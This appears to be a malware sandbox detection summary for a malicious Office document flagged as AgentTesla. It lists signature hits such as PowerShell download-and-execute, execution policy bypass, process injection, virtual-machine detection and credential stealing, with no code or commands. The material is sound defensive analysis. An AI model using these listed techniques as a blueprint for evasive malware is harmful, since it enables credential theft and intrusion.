Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)